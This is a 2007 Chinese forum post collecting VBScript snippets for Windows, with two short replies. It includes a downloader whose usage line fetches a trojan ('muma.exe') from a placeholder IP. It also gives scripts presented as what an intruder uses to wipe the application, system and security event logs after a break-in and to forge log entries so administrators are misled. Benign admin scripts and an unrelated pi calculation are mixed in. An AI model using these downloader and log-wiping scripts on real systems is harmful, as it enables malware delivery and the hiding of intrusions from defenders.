蓝色动力网络

 找回密码
 立即注册

扫一扫,访问微社区

QQ登录

只需一步,快速开始

查看: 4583|回复: 2

记录一些经典的vbs脚本

[复制链接]
发表于 2007-8-26 12:03:39 | 显示全部楼层 |阅读模式
1.文件下载(无回显) <br/>echo iLocal = LCase(WScript.Arguments(1)) &gt;iget.vbe <br/>echo iRemote = LCase(WScript.Arguments(0)) &gt;&gt;iget.vbe <br/>echo Set xPost = createObject("Microsoft.XMLHTTP") &gt;&gt;iget.vbe <br/>echo xPost.Open "GET",iRemote,0 &gt;&gt;iget.vbe <br/>echo xPost.Send() &gt;&gt;iget.vbe <br/>echo Set sGet = createObject("ADODB.Stream") &gt;&gt;iget.vbe <br/>echo sGet.Mode = 3 &gt;&gt;iget.vbe <br/>echo sGet.Type = 1 &gt;&gt;iget.vbe <br/>echo sGet.Open() &gt;&gt;iget.vbe <br/>echo sGet.Write(xPost.responseBody) &gt;&gt;iget.vbe <br/>echo sGet.SaveToFile iLocal,2 &gt;&gt;iget.vbe <br/><br/>用法: cscript hget.vbs http://111.111.111.111/muma.exe muma.exe <br/><br/><br/>2.列举进程 <br/>@echo for each ps in getobject _ &gt;ps.vbs <br/>@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ &gt;&gt;ps.vbs <br/>@echo wscript.echo ps.handle^&amp;vbtab^&amp;ps.name^&amp;vbtab^&amp;ps.executablepath:next &gt;&gt;ps.vbs <br/><br/>用法:cscript ps.vbs <br/><br/><br/>3.终止进程 <br/>@echo for each ps in getobject _ &gt;pskill.vbs <br/>@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ &gt;&gt;pskill.vbs <br/>@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next &gt;&gt;pskill.vbs <br/><br/>用法:cscript pskill.vbs pid <br/><br/><br/>4.重启系统 <br/>@echo for each os in getobject _ &gt;reboot.vbs <br/>@echo ("winmgmts:!\\.\root\cimv2:win32_operatingsystem").instances_ &gt;&gt;reboot.vbs <br/>@echo os.win32shutdown(2):next &gt;&gt;reboot.vbs <br/><br/>用法:cscript reboot.vbs <br/><br/><br/><br/><br/>VBS脚本在系统安全中的八则巧妙应用 <br/>VBS脚本病毒的大量流行使我们对VBS的功能有了一个全新的认识,现在大家对它也开始重视起来。VBS代码在本地是通过Windows Script Host(WSH)解释执行的。VBS脚本的执行离不开WSH,WSH是微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。利用WSH,用户能够操纵WSH对象、ActiveX对象、注册表和文件系统。在Windows 2000下,还可用WSH来访问Windows NT活动目录服务。 <br/>   <br/>  用VBS编写的脚本程序在窗口界面是由wscript.exe文件解释执行的,在字符界面由cscript.exe文件解释执行。wscript.exe是一个脚本语言解释器,正是它使得脚本可以被执行,就象执行批处理一样。关于VBS大家一定比我熟悉多了,所以再不废话,直接进入主题,看看我总结的VBS在系统安全中的八则妙用吧。 <br/>   <br/>  一、给注册表编辑器解锁 <br/>   <br/>  用记事本编辑如下内容: <br/>   <br/>  DIM WSH <br/>  SET WSH=WSCRIPT.CreateObject("WSCRIPT.SHELL") '击活WScript.Shell对象 <br/>  WSH.POPUP("解锁注册表编辑器!") <br/>  '显示弹出信息“解锁注册表编辑器!” <br/>  WSH.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion <br/>  \Policies\System\DisableRegistryTools",0,"REG_DWORD" <br/>  '给注册表编辑器解锁 <br/>  WSH.POPUP("注册表解锁成功!") <br/>  '显示弹出信息“注册表解锁成功!” <br/>  保存为以.vbs为扩展名的文件,使用时双击即可。 <br/>   <br/>  二、关闭Win NT/2000的默认共享 <br/>   <br/>  用记事本编辑如下内容: <br/>   <br/>  Dim WSHShell'定义变量 <br/>  set WSHShell=CreateObject("WScript.shell") '创建一个能与操作系统沟通的对象WSHShell <br/>  Dim fso,dc <br/>  Set fso=CreateObject("Scripting.FileSystemObject")'创建文件系统对象 <br/>  set dc=fso.Drives '获取所有驱动器盘符 <br/>  For Each d in dc <br/>  Dim str <br/>  WSHShell.run("net share"&amp;d.driveletter &amp;"$ /delete")'关闭所有驱动器的隐藏共享 <br/>  next <br/>  WSHShell.run("net share admin$ /delete") <br/>  WSHShell.run("net share ipc$ /delete")'关闭admin$和ipc$管道共享 <br/>   <br/>  现在来测试一下,先打开cmd.exe,输入net share命令就可以看到自己机子上的共享。双击执行stopshare.vbs后,会看见窗口一闪而过。然后再在cmd里输入net share命令,这时候没有发现共享列表了 <br/>   <br/>  三、显示本机IP地址 <br/>   <br/>  有许多时候,我们需要知道本机的IP地址,使用各种软件虽然可以办到,但用VBS脚本也非常的方便。用记事本编辑如下内容: <br/>   <br/>  Dim WS <br/>  Set WS=CreateObject("MSWinsock.Winsock") <br/>  IPAddress=WS.LocalIP <br/>  MsgBox "Local IP=" &amp; IPAddress <br/>   <br/>  将上面的内容保存为ShowIP.vbs,双击执行即可得到本机IP地址。 <br/>   <br/>  四、利用脚本编程删除日志 <br/>   <br/>  入侵系统成功后黑客做的第一件事便是清除日志,如果以图形界面远程控制对方机器或是从终端登陆进入,删除日志不是一件困难的事,由于日志虽然也是作为一种服务运行,但不同于http,ftp这样的服务,可以在命令行下先停止,再删除,在命令行下用net stop eventlog是不能停止的,所以有人认为在命令行下删除日志是很困难的,实际上不是这样,比方说利用脚本编程中的VMI就可以删除日志,而且非常的简单方便。源代码如下: <br/>   <br/>  strComputer= "." <br/>  Set objWMIService = GetObject("winmgmts:" _ <br/>  &amp; "{impersonationLevel=impersonate,(Backup)}!\\" &amp; _ <br/>  strComputer &amp; "\root\cimv2") <br/>  dim mylogs(3) <br/>  mylogs(1)="application" <br/>  mylogs(2)="system" <br/>  mylogs(3)="security" <br/>  for Each logs in mylogs <br/>  Set colLogFiles=objWMIService.ExecQuery _ <br/>  ("Select * from Win32_NTEventLogFile where LogFileName='"&amp;logs&amp;"'") <br/>  For Each objLogfile in colLogFiles <br/>  objLogFile.ClearEventLog() <br/>  Next <br/>  next <br/>   <br/>  将上面的代码保存为cleanevent.vbs文件即可。在上面的代码中,首先获得object对象,然后利用其clearEventLog()方法删除日志。建立一个数组,application,security,system,如果还有其他日志也可以加入数组。然后用一个for循环,删除数组中的每一个元素,即各个日志。 <br/>   <br/>  五、利用脚本伪造日志 <br/>   <br/>  删除日志后,任何一个有头脑的管理员面对空空的日志,马上就会反应过来被入侵了,所以一个聪明的黑客的学会如何伪造日志。利用脚本编程中的eventlog方法创造日志非常简单,请看下面的代码: <br/>   <br/>  set ws=wscript.createobject("Wscript.shell") <br/>  ws.logevent 0 ,"write log success" '创建一个成功执行日志 <br/>   <br/>  将上面的代码保存为createlog.vbs即可。这段代码很容易理解,首先获得wscript的一个shell对象,然后利用shell对象的logevent方法。logevent的用法:logevent eventtype,"description" [,remote system],其中eventtype为日志类型,可以使用的参数如下:0代表成功执行,1执行出错,2警告,4信息,8成功审计,16故障审计。所以上面代码中,把0改为1,2,4,8,16均可,引号中的内容为日志描述。利用这种方法写的日志有一个缺点,即只能写到应用程序日志,而且日志来源只能为WSH,即Windows Scripting Host,所以不能起太多的隐蔽作用,在此仅供大家参考。 <br/>   <br/>  六、禁用开始菜单选项 <br/>   <br/>  用记事本编辑如下内容: <br/>   <br/>  Dim ChangeStartMenu <br/>  Set ChangeStartMenu=WScript.CreateObject("WScript.Shell") <br/>  RegPath="HKCR\Software\Microsoft\Windows\CurrentVersion\Policies\" <br/>  Type_Name="REG_DWORD" <br/>  Key_Data=1 <br/>   <br/>  StartMenu_Run="NoRun" <br/>  StartMenu_Find="NoFind" <br/>  StartMenu_Close="NoClose" <br/>   <br/>  Sub Change(Argument) <br/>  ChangeStartMenu.RegWrite RegPath&amp;Argument,Key_Data,Type_Name <br/>  MsgBox("Success!") <br/>  End Sub <br/>   <br/>  Call Change(StartMenu_Run) '禁用“开始”菜单中的“运行”功能 <br/>  Call Change(StartMenu_Find) '禁用“开始”菜单中的“查找”功能 <br/>  Call Change(StartMenu_Close) '禁用“开始”菜单中的“关闭系统”功能 <br/>   <br/>  将以上代码保存为ChangeStartMenu.vbs文件,使用时双击即可。 <br/>   <br/>  七、执行外部程序 <br/>   <br/>  用记事本编辑如下内容: <br/>   <br/>  DIM objShell <br/>  set objShell=wscript.createObject("wscript.shell") <br/>  iReturn=objShell.Run("cmd.exe /C set var=world", 1, TRUE) <br/>   <br/>  保存为.vbs文件即可。在这段代码中,我们首先设置了一个环境变量,其名为var,而值为world,用户可以使用%Comspec%来代替cmd.exe,并且可以把命令:set var=world改成其它的命令,这样就可以使它可以运行任意的命令。 <br/>   <br/>  八、重新启动指定的IIS服务 <br/>   <br/>  用记事本编辑如下内容: <br/>   <br/>  Const ADS_SERVICE_STOPPED = 1 <br/>  Set objComputer = GetObject("WinNT://MYCOMPUTER,computer") <br/>  Set objService = objComputer.GetObject("Service","MYSERVICE") <br/>  If (objService.Status = ADS_SERVICE_STOPPED) Then <br/>  objService.Start <br/>  End If <br/>   <br/>  将它以startsvc.vbs为名保存在C盘根目录。并通过如下命令执行:cscript c:\startsvc.vbs。运行后,经你指定的IIS服务项将被重新开启。 <br/>   <br/>  最后,我们再说说开篇时提到的VBS脚本病毒的防范方法。VBS病毒的执行离不开WSH,在带给人们便利的同时,WSH也为病毒的传播留下可乘之机。所以要想防范VBS病毒,可以选择将WSH卸载,只要打开控制面板,找到“添加/删除程序”,点选“Windows安装程序”,再鼠标双击其中的“附件”一项,然后再在打开的窗口中将“Windows Scripting Host”一项的“√”去掉,然后连续点两次“确定”就可以将WSH卸载。或者,你也可以点击“我的电脑”→“查看”→“文件夹选项”,在弹出的对话框中,点击“文件类型”,然后删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射,都可以达到防范VBS脚本病毒的目的。 <br/><br/><br/><br/><br/><br/><br/><br/><br/>当最后一项的绝对值小于0.000001时停止计算。 <br/><br/>编写如下VBScript程序代码: <br/><br/>&lt;HTML&gt; <br/><br/>&lt;HEAD&gt;&lt;TITLE&gt;计算圆周率π&lt;/TITLE&gt;&lt;/HEAD&gt; <br/><br/>&lt;BODY&gt;&lt;H3&gt;计算圆周率π&lt;/H3&gt;&lt;HR&gt; <br/><br/>&lt;INPUT TYPE="Button" NAME="Button1" VALUE="计算"&gt; <br/><br/>&lt;SCRIPT FOR="Button1" EVENT="onClick" LANGUAGE="VBScript"&gt; <br/><br/>k = 1: s = 1: t = 1: m = 1 <br/><br/><br/>图3-12 计算圆周率 <br/>While Abs(t) &gt; 0.0000001 <br/><br/>k = k + 2 <br/><br/>m = -m <br/><br/>t = m / k <br/><br/>s = s + t <br/><br/>Wend <br/><br/>MsgBox "圆周率π=" &amp; 4 * s <br/><br/>&lt;/SCRIPT&gt; <br/><br/>&lt;/BODY&gt; <br/><br/>&lt;/HTML&gt; <br/><br/>执行VBScript程序,浏览器显示如图3-12所示。 <br/><br/>注意:程序运行时间可能很长。
发表于 2007-9-1 01:05:15 | 显示全部楼层
<p>为什么</p><p>为什么</p><p>为什么</p><p>别的不多说出点原创</p>
回复 支持 反对

使用道具 举报

发表于 2009-2-27 15:14:05 | 显示全部楼层
确实Re:记录一些经典的vbs脚本经典
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

蓝色动力网络微信平台
网站管理,业务合作联系邮箱: admin#lansedongli.com    QQ:13412492 限网站业务问题.
网站帐号、密码、密保找回请使用注册邮箱,发送邮件至 password#lansedongli.com ,否则不予受理.
免责声明:本论坛所有文字和图片仅代表其个人观点.
本站某些资料或文章来自于互联网,不代表本站观点,如果侵犯了您的权益,请来信告知,我们会在三天内删除.
为了给大家一个更好的交流场所,请勿在本论坛发表与中华人民共和国法律相抵触的言论,请合作,谢谢!
Copyright © 2007-2019 Corporation Powered by网吧系统 版权所有    转载请注明!
浙ICP备11043737号 程序:Discuz! x3.4

湘公网安备 43018102000145号

手机版|Archiver|蓝色动力网络   

快速回复 返回顶部 返回列表